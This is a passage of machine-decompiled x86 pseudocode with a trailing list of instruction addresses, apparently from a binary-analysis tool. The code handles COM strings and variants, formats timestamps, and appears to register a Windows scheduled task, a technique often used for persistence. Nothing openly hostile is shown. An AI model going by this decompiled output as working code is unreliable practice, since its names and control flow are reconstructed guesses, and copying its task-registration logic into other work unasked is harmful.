																																_t1037 = _v88;
																																_v92 = 0;
																																_t836 =  *((intOrPtr*)( *_t1037 + 0x30))(_t1037, 0,  &_v92);
																																_t1038 = _v88;
																																 *((intOrPtr*)( *_t1038 + 8))(_t1038);
																																__eflags = _t836;
																																if(_t836 < 0) {
																																	goto L142;
																																} else {
																																	_t1039 = _v92;
																																	_v72 = 0;
																																	_t839 =  *((intOrPtr*)( *_t1039))(_t1039, 0x1378f6c,  &_v72);
																																	_t1040 = _v92;
																																	 *((intOrPtr*)( *_t1040 + 8))(_t1040);
																																	__eflags = _t839;
																																	if(_t839 < 0) {
																																		goto L142;
																																	} else {
																																		_t1160 =  *((intOrPtr*)( *_v72 + 0x2c));
																																		_t843 = _v112;
																																		__eflags =  *((intOrPtr*)(_t843 + 0x14)) - 8;
																																		if(__eflags >= 0) {
																																			_t843 =  *_t843;
																																		}
																																		_t844 = E012F9580( &_v112, __eflags, _t843);
																																		_v32 = 0xf;
																																		_t845 =  *_t844;
																																		__eflags = _t845;
																																		if(_t845 == 0) {
																																			_t846 = 0;
																																			__eflags = 0;
																																		} else {
																																			_t846 =  *_t845;
																																		}
																																		_t847 =  *_t1160(_v72, _t846);
																																		_v32 = 0xffffffff;
																																		_t1127 = _v112;
																																		_v116 = _t847;
																																		__eflags = _t1127;
																																		if(_t1127 != 0) {
																																			asm("lock xadd [esi+0x8], ecx");
																																			__eflags = _t1104 == 1;
																																			if(_t1104 == 1) {
																																				__eflags = _t1127;
																																				if(_t1127 != 0) {
																																					_t900 =  *_t1127;
																																					__eflags = _t900;
																																					if(_t900 != 0) {
																																						__imp__#6(_t900);
																																						 *_t1127 = 0;
																																					}
																																					_t901 =  *(_t1127 + 4);
																																					__eflags = _t901;
																																					if(_t901 != 0) {
																																						L0132ECE6(_t901);
																																						_t1208 = _t1208 + 4;
																																						 *(_t1127 + 4) = 0;
																																					}
																																					_push(0xc);
																																					E0132EABA(_t1127);
																																					_t847 = _v116;
																																					_t1208 = _t1208 + 8;
																																				}
																																			}
																																		}
																																		__eflags = _t847;
																																		if(_t847 >= 0) {
																																			_t974 = _v52;
																																			_t1073 =  &_v100;
																																			_t849 =  *((intOrPtr*)( *_t974 + 0x2c))(_t974,  &_v100);
																																			__eflags = _t849;
																																			if(_t849 >= 0) {
																																				_t1051 = _v100;
																																				 *((intOrPtr*)( *_t1051 + 0x98))(_t1051, 0xffffffff);
																																				_t974 = _v52;
																																				 *((intOrPtr*)( *_t974 + 0x30))(_t974, _v100);
																																			}
																																			_t1104 = 8;
																																			_v104 = 0;
																																			_v204 = 8;
																																			_t852 =  *( *_v56 + 0x44);
																																			_v108 = _t852;
																																			__imp__#2(0x13836c0);
																																			_v196 = _t852;
																																			__eflags = _t852;
																																			if(__eflags == 0) {
																																				L191:
																																				E0132FAD0(0x8007000e);
																																				goto L192;
																																			} else {
																																				_v32 = 0x10;
																																				asm("movups xmm0, [ebp-0xb0]");
																																				asm("movups [ebp-0x78], xmm0");
																																				_t853 = E0132EA8A(_t1127, __eflags, 0xc);
																																				_t1161 = _t853;
																																				_t1208 = _t1208 + 4;
																																				_v120 = _t1161;
																																				_v32 = 0x11;
																																				__eflags = _t1161;
																																				if(_t1161 == 0) {
																																					_t1127 = 0;
																																					__eflags = 0;
																																				} else {
																																					asm("xorps xmm0, xmm0");
																																					asm("movq [esi], xmm0");
																																					 *(_t1161 + 8) = 0;
																																					 *(_t1161 + 4) = 0;
																																					 *(_t1161 + 8) = 1;
																																					_t853 = E0132FAF0(_t947, 0x13836c2);
																																					 *_t1161 = _t853;
																																				}
																																				_v32 = 0x10;
																																				_v120 = _t1127;
																																				__eflags = _t1127;
																																				if(_t1127 == 0) {
																																					L192:
																																					E0132FAD0(0x8007000e);
																																					goto L193;
																																				} else {
																																					_v32 = 0x12;
																																					_v188 = _t1104;
																																					_t1104 =  *_t1127;
																																					__eflags = _t1104;
																																					if(__eflags != 0) {
																																						__imp__#149(_t1104);
																																						__imp__#150(_t1104, _t853);
																																						_v180 = _t853;
																																						__eflags = _t853;
																																						if(__eflags == 0) {
																																							goto L189;
																																						} else {
																																							goto L153;
																																						}
																																					} else {
																																						_v180 = _t1104;
																																						L153:
																																						_v32 = 0x13;
																																						asm("movups xmm0, [ebp-0xa0]");
																																						asm("movups [ebp-0xc0], xmm0");
																																						_t1119 = E0132EA8A(_t1127, __eflags, 0xc);
																																						_t1208 = _t1208 + 4;
																																						_v112 = _t1119;
																																						_v32 = 0x14;
																																						__eflags = _t1119;
																																						if(_t1119 == 0) {
																																							_t1104 = 0;
																																							__eflags = 0;
																																						} else {
																																							asm("xorps xmm0, xmm0");
																																							asm("movq [edi], xmm0");
																																							 *(_t1119 + 8) = 0;
																																							 *(_t1119 + 4) = 0;
																																							 *(_t1119 + 8) = 1;
																																							 *_t1119 = E0132FAF0(_t947, 0x13836c2);
																																						}
																																						_v32 = 0x13;
																																						_v132 = _t1104;
																																						__eflags = _t1104;
																																						if(_t1104 == 0) {
																																							goto L189;
																																						} else {
																																							_v32 = 0x15;
																																							_v172 = 8;
																																							_t856 =  *_t1104;
																																							_v112 = _t856;
																																							__eflags = _t856;
																																							if(_t856 != 0) {
																																								__imp__#149(_t856);
																																								__imp__#150(_v112, _t856);
																																								_v164 = _t856;
																																								__eflags = _t856;
																																								if(_t856 == 0) {
																																									L193:
																																									E0132FAD0(0x8007000e);
																																									asm("int3");
																																									asm("int3");
																																									_push(_t1170);
																																									_t1172 = _t1208;
																																									_push(0xffffffff);
																																									_push(0x1366305);
																																									_push( *[fs:0x0]);
																																									_t649 =  *0x13a4018; // 0x39cca9f6
																																									_t650 = _t649 ^ _t1172;
																																									_v648 = _t650;
																																									_push(_t1127);
																																									_push(_t1104);
																																									_push(_t650);
																																									 *[fs:0x0] =  &_v644;
																																									_t1105 = _v624;
																																									asm("xorps xmm0, xmm0");
																																									_v724 = _t1105;
																																									_v756 = _t1105;
																																									asm("movlpd [ebp-0x30], xmm0");
																																									E0134A72C(_t974, _t1073,  &_v680);
																																									_push( &_v680);
																																									_push( &_v716);
																																									E0134A14E();
																																									_t657 = _v712;
																																									_t1210 = _t1208 - 0x70 + 0xc;
																																									__eflags = _t657 - 0x3b;
																																									if(_t657 != 0x3b) {
																																										_t658 = _t657 + 1;
																																										__eflags = _t658;
																																										_v112 = _t658;
																																									} else {
																																										_t761 = _v108;
																																										__eflags = _t761 - 0x17;
																																										if(_t761 >= 0x17) {
																																											_v108 = 0;
																																											_v112 = 0;
																																										} else {
																																											_v112 = 0;
																																											_v108 = _t761 + 1;
																																										}
																																									}
																																									_v56 = 0;
																																									_v52 = 0xf;
																																									_v72 = 0;
																																									_t1128 = E012F57D0(_t947, _t1073, _t1105, 0x110);
																																									_v56 = 0x104;
																																									_v120 = _t1128;
																																									_v52 = 0x10f;
																																									E013478D0(_t1105, _t1128, 0, 0x104);
																																									 *((char*)(_t1128 + 0x104)) = 0;
																																									E012F5760( &_v72,  &_v120);
																																									_v36 = 0;
																																									__eflags = _v52 - 0x10;
																																									_t665 =  >=  ? _v72 :  &_v72;
																																									_t666 = E0134A70D( >=  ? _v72 :  &_v72, _v56, "%Y-%m-%dT%H:%M:%S",  &_v116);
																																									_t1211 = _t1210 + 0x28;
																																									_push(0);
																																									__eflags = _t666;
																																									if(_t666 == 0) {
																																										 *(_t1105 + 0x10) = 0;
																																										 *(_t1105 + 0x14) = 7;
																																										 *_t1105 = 0;
																																										E012F51B0(_t947, _t1105, _t1105, _t1128, 0x13836c0);
																																										_t982 = _v52;
																																										__eflags = _t982 - 0x10;
																																										if(_t982 >= 0x10) {
																																											_t987 = _t982 + 1;
																																											__eflags = _t987;
																																											_push(_t987);
																																											goto L213;
																																										}
																																										goto L214;
																																									} else {
																																										_push(_t666);
																																										_t988 =  &_v72;
																																										L217();
																																										__eflags = _v52 - 0x10;
																																										_t673 =  >=  ? _v72 :  &_v72;
																																										_t1131 =  &((E012F5640( >=  ? _v72 :  &_v72))[_v56]);
																																										__eflags = _v52 - 0x10;
																																										_t676 =  >=  ? _v72 :  &_v72;
																																										_t1107 = E012F5640( >=  ? _v72 :  &_v72);
																																										_v132 = 0;
																																										_v128 = 7;
																																										_v148 = 0;
																																										_t1211 = _t1211 + 8;
																																										_t680 = _t1131 - _t1107;
																																										_v152 = _t680;
																																										__eflags = _t680 - 7;
																																										if(_t680 <= 7) {
																																											L207:
																																											_v124 =  &_v148;
																																											_v36 = 1;
																																											__eflags = _t1107 - _t1131;
																																											while(_t1107 != _t1131) {
																																												E012FC140(_t947,  &_v148, _t1107, _t1131,  *_t1107 & 0x0000ffff);
																																												_t1107 =  &(_t1107[1]);
																																												__eflags = _t1107 - _t1131;
																																											}
																																											_t1105 = _v156;
																																											asm("movups xmm0, [ebp-0x74]");
																																											_v148 = 0;
																																											_t683 = _v52;
																																											 *(_t1105 + 0x10) = 0;
																																											 *(_t1105 + 0x14) = 0;
																																											asm("movups [edi], xmm0");
																																											asm("movq xmm0, [ebp-0x64]");
																																											asm("movq [edi+0x10], xmm0");
																																											_v132 = 0;
																																											_v128 = 7;
																																											__eflags = _t683 - 0x10;
																																											if(_t683 >= 0x10) {
																																												_push(_t683 + 1);
																																												L213:
																																												E012F56A0(_t947, _t1105, _v72);
																																											}
																																											L214:
																																											 *[fs:0x0] = _v44;
																																											_pop(_t1129);
																																											__eflags = _v48 ^ _t1172;
																																											return E0132EA79(_v48 ^ _t1172, _t1129);
																																										} else {
																																											__eflags = _t680 - 0x7ffffffe;
																																											if(__eflags > 0) {
																																												E012F4B30(_t988, __eflags);
																																												goto L216;
																																											} else {
																																												_t750 = _t680 | 0x00000007;
																																												__eflags = _t750 - 0x7ffffffe;
																																												if(__eflags <= 0) {
																																													__eflags = _t750 - 0xa;
																																													_t751 =  <  ? 0xa : _t750;
																																												} else {
																																													_t751 = 0x7ffffffe;
																																												}
																																												_v120 = _t751;
																																												_t988 =  ~(0 | __eflags > 0x00000000) | _t751 + 0x00000001;
																																												__eflags = _t988 - 0x7fffffff;
																																												if(_t988 > 0x7fffffff) {
																																													L216:
																																													E012F4A60();
																																													asm("int3");
																																													asm("int3");
																																													asm("int3");
																																													asm("int3");
																																													asm("int3");
																																													asm("int3");
																																													asm("int3");
																																													asm("int3");
																																													asm("int3");
																																													asm("int3");
																																													_push(_t1172);
																																													_t1174 = _t1211;
																																													_t1214 = _t1211 - 0x14;
																																													_push(_t947);
																																													_t949 = _t988;
																																													_t990 = _v764;
																																													_t480 = _t949 + 0x10; // 0x10
																																													_t690 = _t480;
																																													_push(_t1131);
																																													_t1132 =  *_t690;
																																													_v780 = _t690;
																																													__eflags = _t990 - _t1132;
																																													if(_t990 > _t1132) {
																																														_t1074 =  *(_t949 + 0x14);
																																														_push(_t1107);
																																														_v56 = _t1074;
																																														_t1109 = _t990 - _t1132;
																																														_v52 = _t1109;
																																														__eflags = _t1109 - _t1074 - _t1132;
																																														if(_t1109 > _t1074 - _t1132) {
																																															__eflags = 0x7fffffff - _t1132 - _t1109;
																																															if(__eflags < 0) {
																																																E012F4B30(_t990, __eflags);
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																_push(_t1174);
																																																_t1175 = _t1214;
																																																_push(_t949);
																																																_t950 = _t990;
																																																_t991 = _v796;
																																																_push(_t1132);
																																																_push(_t1109);
																																																_t1110 = _v800;
																																																_t1075 =  *(_t950 + 0x14);
																																																_t1133 =  *((intOrPtr*)(_t950 + 0x10));
																																																_v824 = _t1110;
																																																_v813 = _t991;
																																																_v828 = _t1075;
																																																__eflags = _t1110 - _t1075 - _t1133;
																																																if(_t1110 > _t1075 - _t1133) {
																																																	__eflags = 0x7fffffff - _t1133 - _t1110;
																																																	if(__eflags < 0) {
																																																		E012F4B30(_t991, __eflags);
																																																		asm("int3");
																																																		asm("int3");
																																																		asm("int3");
																																																		asm("int3");
																																																		asm("int3");
																																																		asm("int3");
																																																		asm("int3");
																																																		asm("int3");
																																																		_push(_t1175);
																																																		_push(_t991);
																																																		_push(_t1133);
																																																		_push(2);
																																																		_t1134 = _t991;
																																																		_v848 = _t1134;
																																																		_t701 = E012F8A40(_t950, _v836, 0, L"PT");
																																																		 *(_t1134 + 0x10) = 0;
																																																		__eflags = 0;
																																																		 *(_t1134 + 0x14) = 0;
																																																		asm("movups xmm0, [eax]");
																																																		asm("movups [esi], xmm0");
																																																		asm("movq xmm0, [eax+0x10]");
																																																		asm("movq [esi+0x10], xmm0");
																																																		 *(_t701 + 0x10) = 0;
																																																		 *(_t701 + 0x14) = 7;
																																																		 *_t701 = 0;
																																																		return _t1134;
																																																	} else {
																																																		_t995 = _t1133 + _t1110 | 0x0000000f;
																																																		__eflags = _t995 - 0x7fffffff;
																																																		if(_t995 <= 0x7fffffff) {
																																																			_v44 = _t1075 >> 1;
																																																			__eflags = _t1075 - 0x7fffffff - _v44;
																																																			if(_t1075 <= 0x7fffffff - _v44) {
																																																				_t708 = _v44 + _t1075;
																																																				__eflags = _t995 - _t708;
																																																				_t996 =  <  ? _t708 : _t995;
																																																			} else {
																																																				_t996 = 0x7fffffff;
																																																			}
																																																		} else {
																																																			_t996 = 0x7fffffff;
																																																		}
																																																		_t532 = _t996 + 1; // 0x80000000
																																																		_v44 = _t996;
																																																		_t710 = E012F57D0(_t950, _t1075, _t1110, _t532);
																																																		_v52 = _t710;
																																																		 *((intOrPtr*)(_t950 + 0x10)) = _t1133 + _t1110;
																																																		__eflags = _v60 - 0x10;
																																																		 *(_t950 + 0x14) = _v44;
																																																		_v44 = _v45;
																																																		_push(_t1133);
																																																		if(_v60 < 0x10) {
																																																			_push(_t950);
																																																			_push(_t710);
																																																			E01345ED0();
																																																			_t1136 = _t1133 + _v52;
																																																			__eflags = _t1136;
																																																			E013478D0(_t1110, _t1136, _v44, _t1110);
																																																			 *((char*)(_t1136 + _t1110)) = 0;
																																																			E012F5760(_t950,  &_v52);
																																																			return _t950;
																																																		} else {
																																																			_t1112 =  *_t950;
																																																			_push( *_t950);
																																																			_push(_t710);
																																																			E01345ED0();
																																																			_t1138 = _t1133 + _v52;
																																																			E013478D0( *_t950, _t1138, _v44, _v56);
																																																			 *((char*)(_t1138 + _v56)) = 0;
																																																			_t720 = _v60 + 1;
																																																			__eflags = _t720;
																																																			_push(_t720);
																																																			E012F56A0(_t950,  *_t950, _t1112);
																																																			 *_t950 = _v52;
																																																			return _t950;
																																																		}
																																																	}
																																																} else {
																																																	_v44 = _t950;
																																																	 *((intOrPtr*)(_t950 + 0x10)) = _t1110 + _t1133;
																																																	_t725 = _t950;
																																																	__eflags = _t1075 - 0x10;
																																																	if(_t1075 >= 0x10) {
																																																		_t725 =  *_t950;
																																																		_v44 =  *_t950;
																																																	}
																																																	E013478D0(_t1110, _t725 + _t1133, _t991, _t1110);
																																																	_t1002 = _v44 + _t1110;
																																																	__eflags = _t1002;
																																																	 *((char*)(_t1002 + _t1133)) = 0;
																																																	return _t950;
																																																}
																																															} else {
																																																_t1003 = _t990 | 0x0000000f;
																																																__eflags = _t1003 - 0x7fffffff;
																																																if(_t1003 <= 0x7fffffff) {
																																																	_v40 = _t1074 >> 1;
																																																	__eflags = _t1074 - 0x7fffffff - _v40;
																																																	if(_t1074 <= 0x7fffffff - _v40) {
																																																		_t733 = _v40 + _t1074;
																																																		__eflags = _t1003 - _t733;
																																																		_t1004 =  <  ? _t733 : _t1003;
																																																	} else {
																																																		_t1004 = 0x7fffffff;
																																																	}
																																																} else {
																																																	_t1004 = 0x7fffffff;
																																																}
																																																_t493 = _t1004 + 1; // 0x80000000
																																																_v40 = _t1004;
																																																_t735 = E012F57D0(_t949, _t1074, _t1109, _t493);
																																																__eflags = _v56 - 0x10;
																																																_v48 = _t735;
																																																 *_v44 = _v28;
																																																 *(_t949 + 0x14) = _v40;
																																																_v44 = _v24;
																																																_push(_t1132);
																																																if(_v56 < 0x10) {
																																																	_push(_t949);
																																																	_push(_t735);
																																																	E01345ED0();
																																																	_t1141 = _t1132 + _v48;
																																																	__eflags = _t1141;
																																																	E013478D0(_t1109, _t1141, _v44, _t1109);
																																																	 *((char*)(_t1141 + _t1109)) = 0;
																																																	return E012F5760(_t949,  &_v48);
																																																} else {
																																																	_t1116 =  *_t949;
																																																	_push( *_t949);
																																																	_push(_t735);
																																																	E01345ED0();
																																																	_t1143 = _t1132 + _v48;
																																																	E013478D0( *_t949, _t1143, _v44, _v52);
																																																	 *((char*)(_t1143 + _v52)) = 0;
																																																	_t744 = _v56 + 1;
																																																	__eflags = _t744;
																																																	_push(_t744);
																																																	E012F56A0(_t949,  *_t949, _t1116);
																																																	_t746 = _v48;
																																																	 *_t949 = _t746;
																																																	return _t746;
																																																}
																																															}
																																														} else {
																																															 *_v44 = _t990;
																																															__eflags = _t1074 - 0x10;
																																															if(_t1074 >= 0x10) {
																																																_t949 =  *_t949;
																																															}
																																															_t1145 = _t1132 + _t949;
																																															__eflags = _t1145;
																																															_t749 = E013478D0(_t1109, _t1145, _v24, _t1109);
																																															 *((char*)(_t1145 + _t1109)) = 0;
																																															return _t749;
																																														}
																																													} else {
																																														__eflags =  *(_t949 + 0x14) - 0x10;
																																														if( *(_t949 + 0x14) >= 0x10) {
																																															_t949 =  *_t949;
																																														}
																																														 *_t690 = _t990;
																																														 *((char*)(_t949 + _t990)) = 0;
																																														return _t690;
																																													}
																																												} else {
																																													_t1012 = E012F57D0(_t947, _t1073, _t1107, _t988 + _t988);
																																													_v132 = _v152;
																																													_v128 = _v120;
																																													 *_t1012 = _v148;
																																													_v124 = _t1012;
																																													E012F5760( &_v148,  &_v124);
																																													_t1211 = _t1211 + 0xc;
																																													_v132 = 0;
																																													goto L207;
																																												}
																																											}
																																										}
																																									}
																																								} else {
																																									goto L159;
																																								}
																																							} else {
																																								_v164 = _t856;
																																								L159:
																																								_v32 = 0x16;
																																								asm("movups xmm0, [ebp-0x90]");
																																								_v112 = _v52;
																																								_t858 = _v128;
																																								asm("movups [ebp-0xd8], xmm0");
																																								__eflags =  *((intOrPtr*)(_t858 + 0x14)) - 8;
																																								if(__eflags >= 0) {
																																									_t858 =  *_t858;
																																								}
																																								_t859 = E012F9580( &_v116, __eflags, _t858);
																																								_v32 = 0x17;
																																								_t860 =  *_t859;
																																								__eflags = _t860;
																																								if(_t860 == 0) {
																																									_t1043 = 0;
																																									__eflags = 0;
																																								} else {
																																									_t1043 =  *_t860;
																																								}
																																								asm("movups xmm0, [ebp-0x78]");
																																								asm("movups [eax], xmm0");
																																								_t1234 = _t1208 - 0xfffffffffffffff0;
																																								asm("movups xmm0, [ebp-0xc0]");
																																								asm("movups [eax], xmm0");
																																								asm("movups xmm0, [ebp-0xd8]");
																																								asm("movups [eax], xmm0");
																																								_v112 = _v108(_v56, _t1043, _v112, 6, 0,  &_v104);
																																								_t866 = _v116;
																																								_v128 = _t866;
																																								__eflags = _t866;
																																								if(_t866 != 0) {
																																									asm("lock xadd [eax+0x8], ecx");
																																									__eflags = (_t1043 | 0xffffffff) == 1;
																																									if((_t1043 | 0xffffffff) == 1) {
																																										__eflags = _t866;
																																										if(_t866 != 0) {
																																											_t1049 =  *_t866;
																																											__eflags = _t1049;
																																											if(_t1049 != 0) {
																																												__imp__#6(_t1049);
																																												_t866 = _v128;
																																												 *_t866 = 0;
																																											}
																																											_t1050 =  *(_t866 + 4);
																																											__eflags = _t1050;
																																											if(_t1050 != 0) {
																																												L0132ECE6(_t1050);
																																												_t866 = _v128;
																																												_t1234 = _t1234 + 4;
																																												 *(_v128 + 4) = 0;
																																											}
																																											_push(0xc);
																																											E0132EABA(_t866);
																																											_t1234 = _t1234 + 8;
																																										}
																																									}
																																									_v116 = 0;
																																								}
																																								_t867 =  &_v172;
																																								__imp__#9(_t867);
																																								asm("lock xadd [edi+0x8], eax");
																																								__eflags = (_t867 | 0xffffffff) == 1;
																																								if((_t867 | 0xffffffff) == 1) {
																																									_t887 =  *_t1104;
																																									__eflags = _t887;
																																									if(_t887 != 0) {
																																										__imp__#6(_t887);
																																										 *_t1104 = 0;
																																									}
																																									_t888 =  *(_t1104 + 4);
																																									__eflags = _t888;
																																									if(_t888 != 0) {
																																										L0132ECE6(_t888);
																																										_t1234 = _t1234 + 4;
																																										 *(_t1104 + 4) = 0;
																																									}
																																									_push(0xc);
																																									E0132EABA(_t1104);
																																									_t1234 = _t1234 + 8;
																																								}
																																								_t1120 = __imp__#9;
																																								_t871 =  *_t1120( &_v188);
																																								asm("lock xadd [esi+0x8], eax");
																																								__eflags = (_t871 | 0xffffffff) == 1;
																																								if((_t871 | 0xffffffff) == 1) {
																																									_t883 =  *_t1127;
																																									__eflags = _t883;
																																									if(_t883 != 0) {
																																										__imp__#6(_t883);
																																										 *_t1127 = 0;
																																									}
																																									_t884 =  *(_t1127 + 4);
																																									__eflags = _t884;
																																									if(_t884 != 0) {
																																										L0132ECE6(_t884);
																																										_t1234 = _t1234 + 4;
																																										 *(_t1127 + 4) = 0;
																																									}
																																									_push(0xc);
																																									E0132EABA(_t1127);
																																								}
																																								_v32 = 0xffffffff;
																																								 *_t1120( &_v204);
																																								_t876 = _v56;
																																								 *((intOrPtr*)( *_t876 + 8))(_t876);
																																								_t878 = _v52;
																																								 *((intOrPtr*)( *_t878 + 8))(_t878);
																																								__eflags = _v112;
																																								if(_v112 < 0) {
																																									goto L100;
																																								} else {
																																									_t880 = _v104;
																																									 *((intOrPtr*)( *_t880 + 8))(_t880);
																																								}
																																								L101:
																																								 *[fs:0x0] = _v40;
																																								_pop(_t1124);
																																								__eflags = _v48 ^ _t1170;
																																								return E0132EA79(_v48 ^ _t1170, _t1124);
																																							}
																																						}
																																					}
																																				}
																																			}
																																		} else {
																																			_t898 = _v72;
																																			 *((intOrPtr*)( *_t898 + 8))(_t898);
																																			goto L142;
																																		}
																																	}
																																}
																															}
																														}
																													}
																												} else {
																													_t914 = _v56;
																													 *((intOrPtr*)( *_t914 + 8))(_t914);
																													_t785 = _v64;
																													L98:
																													 *((intOrPtr*)( *_t785 + 8))(_t785);
																													_t639 = _v52;
																													goto L99;
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			} else {
																				L63:
																				_t639 = _v56;
																				goto L99;
																			}
																		} else {
																			_t639 = _v60;
																			goto L99;
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							} else {
								_t1100 = _t1100 - _t1071;
								_t1059 =  <  ? _t1100 : _t967 | 0xffffffff;
								_push( <  ? _t1100 : _t967 | 0xffffffff);
								_t939 =  >=  ? _v56 :  &_v104;
								E012F51B0(_t945,  &_v160, _t1100, _t1122, ( >=  ? _v56 :  &_v104) + _t1071 * 2);
								asm("movups xmm0, [ebp-0x94]");
								asm("movq xmm1, [ebp-0x84]");
								goto L11;
							}
						}
					}
				}
			}

0x012fab30
0x012fab31
0x012fab39
0x012fab40
0x012fab44
0x012fab46
0x012fab48
0x012fab53
0x012fab54
0x012fab55
0x012fab5b
0x012fab60
0x012fab62
0x012fab66
0x012fab67
0x012fab6b
0x012fab71
0x012fab76
0x012fab79
0x012fab7c
0x012fab7f
0x012fab86
0x012fab8d
0x012fab91
0x012fab97
0x012fae8c
0x012fae8c
0x012fae90
0x012fae99
0x012faea0
0x012faea3
0x012faea8
0x012faeb0
0x012faeb9
0x012faeca
0x012fab9d
0x012fab9f
0x012faba7
0x012fabae
0x012fabb7
0x012fabb9
0x012fabc2
0x012fabc9
0x012fabcb
0x012fabd6
0x012fabd6
0x012fabd8
0x012fabe7
0x012fabec
0x012fabef
0x012fabfd
0x012fac04
0x012fac0c
0x012fac3a
0x012fac41
0x012fac48
0x012fac4c
0x012fac4e
0x012fac0e
0x012fac0e
0x012fac13
0x012fac33
0x012fac15
0x012fac1c
0x012fac1f
0x012fac25
0x012fac25
0x012fac13
0x012fac51
0x012fac55
0x012fac59
0x012fac5e
0x012fac63
0x012fac67
0x012fac6c
0x012fae71
0x012fae71
0x012fae77
0x012fae80
0x012fae84
0x012fae89
0x00000000
0x012fac72
0x012fac74
0x012fac7b
0x012fac82
0x012fac86
0x012fac89
0x012fac98
0x012faca7
0x012faca9
0x012facaf
0x012fad0b
0x012fad10
0x012fad14
0x012fad14
0x012fad1b
0x012fad2c
0x012fad31
0x012fad35
0x012fad43
0x012fad52
0x012fad54
0x012fad5c
0x012fad5e
0x012fad64
0x012fad6d
0x012fad71
0x012fad76
0x012fad76
0x012fad79
0x012fad82
0x012fad89
0x012fad8d
0x012fad90
0x012fad94
0x012fad99
0x012fad9e
0x012fada1
0x012fada8
0x012fada8
0x012fadab
0x012fadb1
0x012fadba
0x012fadbe
0x012fadc3
0x012fadc3
0x012fadc8
0x012fadcf
0x012fadd3
0x012fadd9
0x012fade3
0x012fadec
0x012fadf3
0x012fadf8
0x012fadf8
0x012fadfd
0x012fae07
0x012fae0e
0x012fae11
0x012fae1e
0x012fae27
0x012fae2e
0x012fae33
0x012fae33
0x012fae3f
0x012fae4b
0x012fae58
0x012fae61
0x012fae68
0x012fae6e
0x012fae6e
0x00000000
0x012facb1
0x012facb1
0x012facb2
0x012facbe
0x012facc5
0x012facce
0x012faecd
0x012faed2
0x012faed3
0x012faed4
0x012faed5
0x012faed6
0x012faed7
0x012faed8
0x012faed9
0x012faeda
0x012faedb
0x012faedc
0x012faedd
0x012faede
0x012faedf
0x012faee0
0x012faee3
0x012faee6
0x012faeea
0x012faf01
0x012faf02
0x012faeec
0x012faeec
0x012faeef
0x012faef3
0x00000000
0x012faef5
0x012faef5
0x012faef8
0x012faefb
0x01302620
0x01302621
0x01302629
0x01302630
0x01302634
0x01302636
0x01302638
0x01302643
0x01302644
0x01302645
0x0130264b
0x01302650
0x01302652
0x01302655
0x01302656
0x01302657
0x0130265b
0x01302661
0x01302664
0x01302667
0x0130266a
0x0130266d
0x01302671
0x01302674
0x01302677
0x01302baa
0x01302baa
0x00000000
0x0130267d
0x0130267d
0x0130267f
0x00000000
0x01302685
0x01302685
0x01302689
0x00000000
0x0130268f
0x01302693
0x013026ab
0x013026b1
0x013026b4
0x013026ca
0x013026d0
0x013026d2
0x00000000
0x013026d8
0x013026db
0x013026ed
0x013026ef
0x013026fc
0x01302704
0x0130270b
0x0130270d
0x0130271b
0x01302722
0x01302724
0x01302732
0x01302736
0x01302738
0x0130273f
0x0130274b
0x01302753
0x0130275a
0x0130275f
0x01302762
0x01302766
0x0130276b
0x01302775
0x01302778
0x0130277a
0x01302780
0x01302789
0x01302792
0x0130279b
0x013027a3
0x013027ab
0x013027ad
0x013027b0
0x013027b2
0x01302ba4
0x01302ba7
0x00000000
0x013027b8
0x013027b8
0x013027c3
0x013027c6
0x013027cb
0x013027cd
0x013027d0
0x013027d3
0x013027da
0x013027dc
0x01302811
0x01302811
0x00000000
0x013027de
0x013027de
0x013027e1
0x013027e5
0x013027f1
0x013027f8
0x013027ff
0x01302805
0x01302807
0x01302809
0x013031dc
0x013031e1
0x00000000
0x0130280f
0x01302813
0x01302813
0x0130281a
0x0130281d
0x0130281f
0x00000000
0x01302825
0x01302828
0x01302835
0x01302837
0x01302839
0x01302840
0x01302844
0x01302849
0x0130284e
0x0130284f
0x01302851
0x01302853
0x01302855
0x01302858
0x0130285e
0x0130285e
0x01302864
0x01302867
0x01302869
0x0130286c
0x01302871
0x01302874
0x01302874
0x0130287b
0x0130287e
0x01302883
0x01302883
0x01302886
0x0130288a
0x01302899
0x0130289c
0x0130289f
0x013028a1
0x013028a5
0x013028a7
0x013028a7
0x013028ad
0x013028b2
0x013028b9
0x013028bb
0x013028bd
0x013028c3
0x013028c3
0x013028bf
0x013028bf
0x013028bf
0x013028cb
0x013028cd
0x013028d4
0x013028d7
0x013028d9
0x013028dd
0x013028e2
0x013028e3
0x013028e5
0x013028e7
0x013028e9
0x013028eb
0x013028ed
0x013028f0
0x013028f6
0x013028f6
0x013028fc
0x013028ff
0x01302901
0x01302904
0x01302909
0x0130290c
0x0130290c
0x01302913
0x01302916
0x0130291b
0x0130291b
0x013028e7
0x013028e3
0x0130291e
0x01302925
0x01302931
0x01302934
0x0130293c
0x0130293f
0x01302941
0x0130294b
0x01302951
0x0130295c
0x0130295f
0x01302961
0x00000000
0x01302963
0x01302963
0x0130296b
0x0130296e
0x01302974
0x01302977
0x0130297d
0x01302988
0x0130298b
0x0130298d
0x01302e86
0x01302e86
0x00000000
0x01302993
0x01302993
0x01302999
0x0130299c
0x013029a2
0x013029ad
0x013029b0
0x013029b2
0x00000000
0x013029b8
0x013029b8
0x013029bf
0x013029cb
0x013029ce
0x013029d6
0x013029d9
0x013029db
0x00000000
0x013029e1
0x013029e1
0x013029e8
0x013029f7
0x013029f9
0x013029fc
0x013029ff
0x01302a01
0x01302a04
0x01302a06
0x00000000
0x01302a0c
0x01302a16
0x01302a19
0x01302a1e
0x01302a20
0x01302a23
0x01302a26
0x01302a2d
0x01302a2f
0x01302a64
0x01302a64
0x00000000
0x01302a31
0x01302a31
0x01302a34
0x01302a38
0x01302a44
0x01302a4b
0x01302a52
0x01302a58
0x01302a5a
0x01302a5c
0x013031e6
0x013031eb
0x00000000
0x01302a62
0x01302a66
0x01302a66
0x01302a6d
0x01302a70
0x01302a72
0x00000000
0x01302a78
0x01302a78
0x01302a84
0x01302a87
0x01302a90
0x01302a95
0x01302a96
0x01302a98
0x01302a9a
0x01302a9c
0x01302a9f
0x01302aa5
0x01302aa5
0x01302aab
0x01302aae
0x01302ab0
0x01302ab3
0x01302ab8
0x01302abb
0x01302abb
0x01302ac2
0x01302ac5
0x01302aca
